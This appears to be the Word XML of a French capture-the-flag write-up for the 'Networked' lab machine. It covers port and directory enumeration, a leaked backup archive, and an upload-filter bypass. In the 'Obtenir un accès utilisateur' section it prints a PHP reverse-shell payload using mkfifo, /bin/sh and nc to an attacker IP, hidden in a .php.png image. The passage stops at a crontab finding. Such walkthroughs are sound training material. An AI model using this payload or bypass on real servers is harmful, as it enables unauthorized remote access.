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6D945" w14:textId="616D2219" w:rsidR="00BD5659" w:rsidRDefault="0039679D" w:rsidP="00517708">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B312D43" wp14:editId="68A23D1A">
            <wp:extent cx="5400675" cy="2914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326E" w14:textId="77777777" w:rsidR="003D46ED" w:rsidRDefault="003D46ED" w:rsidP="00517708">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C20D4C" w14:textId="33A39D16" w:rsidR="0039679D" w:rsidRPr="00517708" w:rsidRDefault="0039679D" w:rsidP="00517708">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517708">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67173B2B" w14:textId="77777777" w:rsidR="00F00BC0" w:rsidRDefault="00F00BC0"/>
    <w:p w14:paraId="431A3128" w14:textId="70401FF7" w:rsidR="0039679D" w:rsidRDefault="003D46ED">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Networked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est une machine linux dont l’adresse IP est 10.10.10.146.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10730EAB" w14:textId="6F50DAB3" w:rsidR="003D46ED" w:rsidRDefault="003D46ED">
      <w:r>
        <w:t>Compétences mises en œuvre :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE2E6BD" w14:textId="0AC8FA38" w:rsidR="003D46ED" w:rsidRDefault="003D46ED" w:rsidP="003D46ED">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumération des ports et services d’une machine </w:t>
      </w:r>
      <w:r w:rsidR="00F00BC0">
        <w:t>distante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659AFCCF" w14:textId="77777777" w:rsidR="00517708" w:rsidRDefault="005177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43D30B8" w14:textId="7D31A13C" w:rsidR="009A28FD" w:rsidRPr="00817912" w:rsidRDefault="0039679D" w:rsidP="00817912">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517708">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumération initiale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0561F3" w14:textId="5E149702" w:rsidR="0039679D" w:rsidRDefault="009A0553">
      <w:r>
        <w:t>Nous commençons l’énumération des ports et services avec l’utilitaire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0553" w14:paraId="33735E8B" w14:textId="77777777" w:rsidTr="009A0553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77B34538" w14:textId="7B3F54E9" w:rsidR="009A0553" w:rsidRDefault="009A0553">
            <w:r>
              <w:t>$ nmap -T4 -A 10.10.10.146</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56F2236F" w14:textId="08A7D71A" w:rsidR="009A0553" w:rsidRDefault="009A0553"/>
    <w:p w14:paraId="29F3B665" w14:textId="21934081" w:rsidR="009A0553" w:rsidRDefault="009A0553">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057753EF" wp14:editId="28B42244">
            <wp:extent cx="5760720" cy="1943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5860" w14:textId="65EC98FB" w:rsidR="009A0553" w:rsidRDefault="001A6B58">
      <w:r>
        <w:t>D’après le scan, trois ports sont ouverts :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5C5CD" w14:textId="57C45F73" w:rsidR="001A6B58" w:rsidRDefault="001A6B58" w:rsidP="001A6B58">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22 pour un serveur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en version 7.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE3E434" w14:textId="0C99865C" w:rsidR="001A6B58" w:rsidRDefault="00666DE6" w:rsidP="001A6B58">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>80 pour un serveur Apache en protocole http.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32D2BE" w14:textId="737DDECD" w:rsidR="00666DE6" w:rsidRDefault="00666DE6" w:rsidP="001A6B58">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>443 pour le serveur Apache en protocole https.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED95A08" w14:textId="23865B7F" w:rsidR="00817912" w:rsidRDefault="00817912" w:rsidP="00817912">
      <w:r>
        <w:t>Nous allons faire une énumération des dossiers/fichiers sur le site web en http avec dirsearch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7912" w:rsidRPr="006C15F1" w14:paraId="7EC850F9" w14:textId="77777777" w:rsidTr="00817912">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C12C2C" w14:textId="698A880C" w:rsidR="00817912" w:rsidRPr="00D7492E" w:rsidRDefault="00817912" w:rsidP="00817912">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D7492E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="00D7492E" w:rsidRPr="00D7492E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">dirsearch -w wordlist -e </w:t>
            </w:r>
            <w:r w:rsidR="00D7492E" w:rsidRPr="00D7492E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00D7492E" w:rsidRPr="00D7492E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>php,html</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D7492E" w:rsidRPr="00D7492E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>" -f -t 100 -x 403 -u http:</w:t>
            </w:r>
            <w:r w:rsidR="00D7492E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>//10.10.10.1</w:t>
            </w:r>
            <w:r w:rsidR="00471731">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66D20E95" w14:textId="2052337E" w:rsidR="00817912" w:rsidRPr="00D7492E" w:rsidRDefault="00817912" w:rsidP="00817912">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8E3701" w14:textId="3D81098C" w:rsidR="00817912" w:rsidRDefault="00884E09" w:rsidP="00817912">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A580EB0" wp14:editId="1E1CA398">
            <wp:extent cx="5760720" cy="22485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EEB7" w14:textId="1340E881" w:rsidR="00471731" w:rsidRPr="00471731" w:rsidRDefault="00471731" w:rsidP="00817912">
      <w:r w:rsidRPr="00471731">
        <w:t>Plusieurs dossiers intéressants comme b</w:t>
      </w:r>
      <w:r>
        <w:t>ackup et uploads</w:t>
      </w:r>
      <w:r w:rsidR="00977404">
        <w:t xml:space="preserve"> ainsi que le fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00977404">
        <w:t>upload.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00977404">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3835A617" w14:textId="77777777" w:rsidR="00817912" w:rsidRPr="00471731" w:rsidRDefault="00817912" w:rsidP="00817912"/>
    <w:p w14:paraId="60DBA6EF" w14:textId="77777777" w:rsidR="001A6B58" w:rsidRPr="00471731" w:rsidRDefault="001A6B58"/>
    <w:p w14:paraId="4229B390" w14:textId="77777777" w:rsidR="009A0553" w:rsidRPr="00471731" w:rsidRDefault="009A0553"/>
    <w:p w14:paraId="33FF4E5E" w14:textId="77777777" w:rsidR="00517708" w:rsidRPr="00471731" w:rsidRDefault="00517708">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00471731">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EBC01" w14:textId="05E16C2B" w:rsidR="0039679D" w:rsidRPr="00517708" w:rsidRDefault="0039679D" w:rsidP="00517708">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517708">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtenir un accès utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E9BAC" w14:textId="1CCA942C" w:rsidR="0039679D" w:rsidRDefault="009344E6">
      <w:r>
        <w:t xml:space="preserve">Sur la page </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>upload.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, nous pouvons upload des fichiers :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE78BC" w14:textId="654ABA99" w:rsidR="009344E6" w:rsidRDefault="009344E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A51807F" wp14:editId="43BB3D30">
            <wp:extent cx="3962400" cy="13430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7717" w14:textId="51D1039A" w:rsidR="0011467D" w:rsidRDefault="0011467D">
      <w:r>
        <w:t xml:space="preserve">Sauf si nous essayons d’upload un reverse shell en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, nous avons un message d’erreur : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683289E5" w14:textId="70923C4E" w:rsidR="009344E6" w:rsidRDefault="0011467D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0C9FC0" wp14:editId="3B596C08">
            <wp:extent cx="2209800" cy="971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6E87" w14:textId="7CB46E99" w:rsidR="0011467D" w:rsidRDefault="001900B8">
      <w:r>
        <w:t>Nous allons laisser cela pour un moment, nous y reviendrons peut-être, en attendant le scan dirsearch nous avait montré l’existence d’un dossier backup, si on s’y rend nous voyons :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78CBDD" w14:textId="3C8D1012" w:rsidR="001900B8" w:rsidRDefault="001900B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D66AEF" wp14:editId="17D111B1">
            <wp:extent cx="4505325" cy="2600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4D3F" w14:textId="790D1BE6" w:rsidR="00F44322" w:rsidRDefault="00F44322">
      <w:r>
        <w:t>Nous récupérons alors le fichier backup.tar et le décompressons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4322" w:rsidRPr="006C15F1" w14:paraId="2FFB12B7" w14:textId="77777777" w:rsidTr="00F44322">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F05C0F" w14:textId="65A157B7" w:rsidR="00F44322" w:rsidRDefault="00F44322">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A456A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A456A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A456A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidR="006A234F" w:rsidRPr="00074220">
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://10.10.10.146/backup/backup.tar</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="39F96742" w14:textId="5CD0658A" w:rsidR="006A234F" w:rsidRPr="00A456A7" w:rsidRDefault="009F46DC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">$ tar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>xvf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> backup.tar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06F42CFC" w14:textId="6C0CD07F" w:rsidR="00F44322" w:rsidRDefault="00F44322">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A77ECA" w14:textId="6DE20D98" w:rsidR="009F46DC" w:rsidRDefault="00110A2C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C8ED3CE" wp14:editId="0E6077A8">
            <wp:extent cx="2695575" cy="1076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815F" w14:textId="052287F4" w:rsidR="00C92C5A" w:rsidRDefault="00D964AB">
      <w:r w:rsidRPr="00D964AB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nous avons alors </w:t>
      </w:r>
      <w:r w:rsidR="00A51217" w:rsidRPr="00D964AB">
        <w:t>quatre</w:t>
      </w:r>
      <w:r w:rsidRPr="00D964AB">
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ichiers </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> qu’il faut analyser pour trouver des informations en plus.</w:t>
      </w:r>
      <w:r w:rsidR="006C15F1">
        <w:t xml:space="preserve"> Après une longue recherche, </w:t>
      </w:r>
      <w:r w:rsidR="00025972">
        <w:t xml:space="preserve">il y a </w:t>
      </w:r>
      <w:r w:rsidR="00921DC9">
        <w:t xml:space="preserve">une fonction </w:t>
      </w:r>
      <w:r w:rsidR="001F3C3E">
        <w:t>intéressante</w:t>
      </w:r>
      <w:r w:rsidR="00C6185D">
        <w:t> :</w:t>
      </w:r>
      <w:r w:rsidR="00025972">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00025972">
        <w:t>file_mime_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00025972">
        <w:t xml:space="preserve"> qui vérifie le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00025972">
        <w:t>magic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00025972">
        <w:t xml:space="preserve"> bytes du fichier pour savoir si c’est une image ou non</w:t>
      </w:r>
      <w:r w:rsidR="00C6185D">
        <w:t xml:space="preserve"> et une vérification sur la taille de l’image</w:t>
      </w:r>
      <w:r w:rsidR="00921DC9">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52970106" w14:textId="6BA87C53" w:rsidR="00C92C5A" w:rsidRDefault="00C92C5A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B66115" wp14:editId="01D287E2">
            <wp:extent cx="5760720" cy="18903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648D" w14:textId="1DF4C785" w:rsidR="000F73F9" w:rsidRDefault="00025972">
      <w:r>
        <w:t xml:space="preserve"> Avec cette information, nous pouvons créer une image avec du code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C1567">
        <w:t xml:space="preserve"> (pour avoir un reverse </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007C1567">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007C1567">
        <w:t>)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7224" w14:paraId="580BE459" w14:textId="77777777" w:rsidTr="00D37224">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E0C46FC" w14:textId="54E60492" w:rsidR="00D37224" w:rsidRDefault="00D37224">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>echo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -e </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>npassthru</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>rm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/f ;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>mkfifo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/f ;cat /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.14 4567 &gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/f") ;\n ?&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="004D394E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&gt; black.php.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02CD1C44" w14:textId="11C202C5" w:rsidR="00EC7E38" w:rsidRDefault="00EC7E38"/>
    <w:p w14:paraId="5AF0FD88" w14:textId="4D6B233F" w:rsidR="00EC7E38" w:rsidRDefault="00EC7E38">
      <w:r>
        <w:t xml:space="preserve">Après avoir upload, on se rend sur la page </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00845C8D">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://10.10.10.146/photos.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> pour déclencher le reverse shell et nous avons un shell </w:t>
      </w:r>
      <w:r w:rsidR="00C91898">
        <w:t>en tant qu’apache</w:t>
      </w:r>
      <w:r w:rsidR="002B6C84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E394960" w14:textId="58B4C942" w:rsidR="00EC7E38" w:rsidRDefault="00EC7E38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62132F30" wp14:editId="6C4BA590">
            <wp:extent cx="4323580" cy="1322524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4256" cy="133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CBCF" w14:textId="14554813" w:rsidR="00EC7E38" w:rsidRDefault="002A5361">
      <w:r>
        <w:t xml:space="preserve">Le seul utilisateur sur la machine est </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BABF18" w14:textId="326623C4" w:rsidR="002A5361" w:rsidRDefault="002A5361">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DCC043D" wp14:editId="6C8D6C45">
            <wp:extent cx="1374243" cy="50364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689" cy="51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D4C5" w14:textId="7602FBFC" w:rsidR="002A5361" w:rsidRDefault="00AE34FB">
      <w:r>
        <w:t xml:space="preserve">En se rendant dans son dossier, nous voyons deux fichiers intéressants : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B89DBF8" w14:textId="30BBE0CB" w:rsidR="00AE34FB" w:rsidRDefault="006E3731">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63AE6BB1" wp14:editId="35664D9A">
            <wp:extent cx="3867150" cy="12954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890A" w14:textId="79B50E6F" w:rsidR="006E3731" w:rsidRDefault="006E3731"/>
    <w:p w14:paraId="31F7B54E" w14:textId="06F34A48" w:rsidR="006E3731" w:rsidRDefault="006E3731"/>
    <w:p w14:paraId="3E755092" w14:textId="08F0806A" w:rsidR="006E3731" w:rsidRDefault="00C91898">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Le fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E75574">
        <w:t>crontab.guly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E75574">
        <w:t xml:space="preserve"> montre que le fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E75574">
        <w:t>check_attack.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E75574">
        <w:t xml:space="preserve"> est exécuté toutes les 3 minutes :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD24EE9" w14:textId="7DF310FF" w:rsidR="00E75574" w:rsidRDefault="00E75574">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C16E0D7" wp14:editId="35754880">
            <wp:extent cx="3409180" cy="542012"/>
            <wp:effectExtent l="0" t="0" r="127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0475" cy="5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EF29" w14:textId="77777777" w:rsidR="00E75574" w:rsidRDefault="00E75574"/>
    <w:p w14:paraId="586982AD" w14:textId="77777777" w:rsidR="00E75574" w:rsidRDefault="00E75574"/>
    <w:p w14:paraId="376FF131" w14:textId="77777777" w:rsidR="00EC7E38" w:rsidRDefault="00EC7E38"/>
    <w:p w14:paraId="3336C837" w14:textId="57ABB09C" w:rsidR="00D37224" w:rsidRDefault="00D37224"/>
    <w:p w14:paraId="70A32736" w14:textId="77777777" w:rsidR="00D37224" w:rsidRPr="00D964AB" w:rsidRDefault="00D37224"/>
    <w:p w14:paraId="7D5A86EF" w14:textId="77777777" w:rsidR="001900B8" w:rsidRPr="00D964AB" w:rsidRDefault="001900B8"/>
    <w:p w14:paraId="53AF9A32" w14:textId="12BB4D01" w:rsidR="009344E6" w:rsidRPr="00D964AB" w:rsidRDefault="009344E6"/>
